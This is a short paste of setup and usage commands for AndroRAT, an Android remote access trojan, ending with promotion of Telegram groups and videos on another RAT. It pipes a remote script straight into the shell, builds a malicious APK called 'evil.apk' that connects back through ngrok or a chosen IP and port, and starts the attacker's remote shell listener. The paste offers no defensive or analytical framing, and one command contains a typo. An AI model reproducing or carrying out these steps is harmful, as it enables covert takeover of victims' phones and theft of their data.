SHOW:
|
|
- or go back to the newest paste.
| 1 | How to install AndroRAT Without any ERROR | |
| 2 | ||
| 3 | # Prerequisites | |
| 4 | sudo apt-get update;sudo apt-get upgrade | |
| 5 | sudo apt install wget curl git openjdk-8-jdk openjdk-8-jre zipalign | |
| 6 | ||
| 7 | # Latest Version of APKTOOL | |
| 8 | source <(curl -fsSL https://raw.githubusercontent.com/efxtv/npm/main/apktool/apktool-kali-ubuntu.sh) | |
| 9 | ||
| 10 | Commands to install AndroRat in Kali, Ubuntu, Termux | |
| 11 | git clone https://github.com/karma9874/AndroRAT.git | |
| 12 | cd AndroRAT/ | |
| 13 | sudo apt instll python | |
| 14 | sudo apt install python3-pip | |
| 15 | pip3 install -r requirements.txt | |
| 16 | pip install colorama | |
| 17 | python3 androRAT.py --help | |
| 18 | ||
| 19 | ||
| 20 | # How to use AndroRAT | |
| 21 | To build the apk using ngrok which will also set the listner: | |
| 22 | python3 androRAT.py --build --ngrok -o evil.apk | |
| 23 | ||
| 24 | To build the apk using desired ip and port: | |
| 25 | python3 androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk | |
| 26 | ||
| 27 | To get the interpreter: | |
| 28 | python3 androRAT.py --shell -i 192.169.x.x -p 8000 | |
| 29 | ||
| 30 | ||
| 31 | How to install root in Termux, without having actual root | |
| 32 | https://youtube.com/playlist?list=PLI4Vi9cCSEQkuNBwBcSPxDEEkMZ25X8n9 | |
| 33 | ||
| 34 | How to install L3MON RAT in Termux/Kali Linux | |
| 35 | https://youtube.com/playlist?list=PLI4Vi9cCSEQkpGsWCx23ieY32ENrTTUnJ | |
| 36 | ||
| 37 | Java 8 in Any operating System | |
| 38 | ||
| 39 | Join our telegram group | |
| 40 | t.me/efxtv | |
| 41 | ||
| 42 | Our Paid user Group | |
| 43 | https://t.me/+EUnfbhWXqjszNTc9 | |
| 44 |